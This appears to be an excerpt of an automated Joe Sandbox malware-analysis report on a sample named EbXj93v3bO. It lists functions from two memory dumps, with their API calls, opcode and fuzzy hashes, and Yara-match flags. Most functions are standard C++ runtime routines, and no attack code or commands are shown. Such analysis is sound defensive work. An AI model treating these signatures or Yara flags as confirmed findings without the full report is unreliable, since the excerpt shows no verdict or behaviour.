Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 02545AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02545B8A
__alldvrm.LIBCMT ref: 02545D8B
__alldvrm.LIBCMT ref: 02545DAD

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: 15f16f6d1aff76582a6a7c63413f4bf4d38fb41771a760c18bd0fe289b9f2f1f
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 2DA168729007869FD726CF18C8957AEFFE1FF61318F9841ADD4859B281EB348A41CB58

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 0254FC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0254FD9E

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: 632d3cd7cde00baba36c79514505592893f324a4219fb2912109c48dd66788b8
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: FF413C31A001126BDB256FBCDC45BAEBBA6FF85778F240A15F428D7590DF3448418ABD

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 02546B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0254047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02546B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02546BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02546BEC
__freea.LIBCMT ref: 02546BF5

Part of subcall function 0254390E: RtlAllocateHeap.NTDLL(00000000,0251DAD7,00000000), ref: 02543940

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 286e486dbec3e6eaf78a3260131b342133581c6ddf9ee27f81c8ac6771b1b325
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: 6931C172A0021AAFDF25CF64CC44EAEBBA9FF41718F144268EC14D7190EB35D950CB98

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 02539330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0253934A

Part of subcall function 02539297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 025392C6
Part of subcall function 02539297: ___AdjustPointer.LIBCMT ref: 025392E1

_UnwindNestedFrames.LIBCMT ref: 0253935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02539370
CallCatchBlock.LIBVCRUNTIME ref: 02539398

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 94ed632d434642f51b41ef7454d6619844979f6ef64cef0a85b7bbf183466e25
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: C70117B210014ABBCF125E95CC44EEB3F6AFF88754F045018FE4856120D372E861ABA8

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 02545196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0254513D,00000000,00000000,00000000,00000000,?,025453F5,00000006,0044A378), ref: 025451C8
GetLastError.KERNEL32(?,0254513D,00000000,00000000,00000000,00000000,?,025453F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02542213), ref: 025451D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0254513D,00000000,00000000,00000000,00000000,?,025453F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 025451E2

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: b96f646eedcaa89ee38efde431afb9221e2a2a0cc72a269b6304c9857c974bc6
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 1301F736606222ABC7214F699C44E56FF98BF56FAA7500630FD46E7140EB20D900CAEC

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 02536395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 025363AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 025363C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 025363DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 025363F3

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 0d58571993fc37966632a17863e94ad990b9a298746a8d256cc56dc306bd338b
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 7A01D636610125BBCF17EE94D880AEF7B9EBF85360F001019EC21A7281DA70ED148AFD

Function 02532B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02532BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02532BCF

Part of subcall function 02528687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025286A8
Part of subcall function 02528687: Hash.LIBCMT ref: 025286E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02532BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02532BF8

Part of subcall function 0252F6DF: Hash.LIBCMT ref: 0252F6F1

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: 61832ffcac894d53b4ea1ec3fd530d9caa48f6abab9042e28203bdaed60baadc
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: F2117C76400605AFC715DF64C880ADAF7B9BF59320F04861EE956C7591DB70F904CBA4

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8

Function 02532B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02532BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02532BCF

Part of subcall function 02528687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025286A8
Part of subcall function 02528687: Hash.LIBCMT ref: 025286E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02532BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02532BF8

Part of subcall function 0252F6DF: Hash.LIBCMT ref: 0252F6F1

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: e74d4b208ec68e5d1eb65aa652494b0e54f6ca6e1855f58cb92e31467755ded7
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 90015772400605ABC715DFA5C880ADAB7E9FF89320F008A1EE55A87580DBB0F9048F64

Function 025150CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 025150D1

Part of subcall function 0251BDAE: __EH_prolog3_GS.LIBCMT ref: 0251BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 0251511C
__Getcoll.LIBCPMT ref: 0251512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0251513B

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction ID: 408a09d53da430843c2cf43792612cc5f7aacb2fb04c59a1d49368b21eb7f862
Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
Instruction Fuzzy Hash: AE019E7189130AEFFB05EFA4C440BADB7B1BF94316F50802AD4946B280DB749944CF99

Function 02515B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02515B8D

Part of subcall function 0251BDAE: __EH_prolog3_GS.LIBCMT ref: 0251BDB5

std::_Locinfo::_Locinfo.LIBCPMT ref: 02515BD8
__Getcoll.LIBCPMT ref: 02515BE7
std::_Locinfo::~_Locinfo.LIBCPMT ref: 02515BF7

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction ID: 4c8fff91c6a0d24543c9eda371cdc9b17546e5315559f5be40a1b776cc16d68f
Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
Instruction Fuzzy Hash: A201BC7184030ADFFB04EFA4C480BEDBBB1BF94319F50802AD055AB280DBB89944CF99

Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00405926

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
__Getcoll.LIBCPMT ref: 00405980
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98

Function 0252C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0252C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0252C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0252C190
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0252C1A4

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a2a71a959061ed7bdce3b1e8bd30d2245946173e7f5cfd81b4c57f7c391d99ad
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 0A01FB3A004139BBDF129E94DC428AE3F66BF56352F058413F918841F2D332C678EB8A

Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D

Function 02523773 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0252378C

Part of subcall function 02522B16: ___crtGetTimeFormatEx.LIBCMT ref: 02522B2C
Part of subcall function 02522B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02522B4B

GetLastError.KERNEL32 ref: 025237A8
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 025237BE
__CxxThrowException@8.LIBVCRUNTIME ref: 025237CC

Part of subcall function 025228EC: SetThreadPriority.KERNEL32(?,?), ref: 025228F8

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction ID: ca06bf1cf25b752ad3aab673ee0099c6ffe3991bb0b3c463b4eff49622c8355a
Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
Instruction Fuzzy Hash: 5EF02EB150032639D720B7718C05FBB369CAB02750F500826B900E20C1EA98D40845BC

Function 0251D486 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02521342

Part of subcall function 02520BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02520BD6
Part of subcall function 02520BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02520BF7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02521355
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02521361
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0252136A

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction ID: dbbdc575aa75ade3f5574ccdbcf0af1d853b0e9d064d239bb4dafea152e9ec79
Opcode Fuzzy Hash: 908eada23d29ac960a394de59a6bf3ddc87d7ea813dbe397421aa623f42f7a4d
Instruction Fuzzy Hash: 4DF02431642B26A79F14BA7888105BE35A7BFF3324B04812994119F3C0DE718D088B9C

Function 0040D21F Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110DB

Part of subcall function 0041094D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041096F
Part of subcall function 0041094D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410990

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110EE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110FA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411103

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 8666e49e133600df7792f06d5f606e481117c0b37b42e6d91b2f30d9f4c50a68
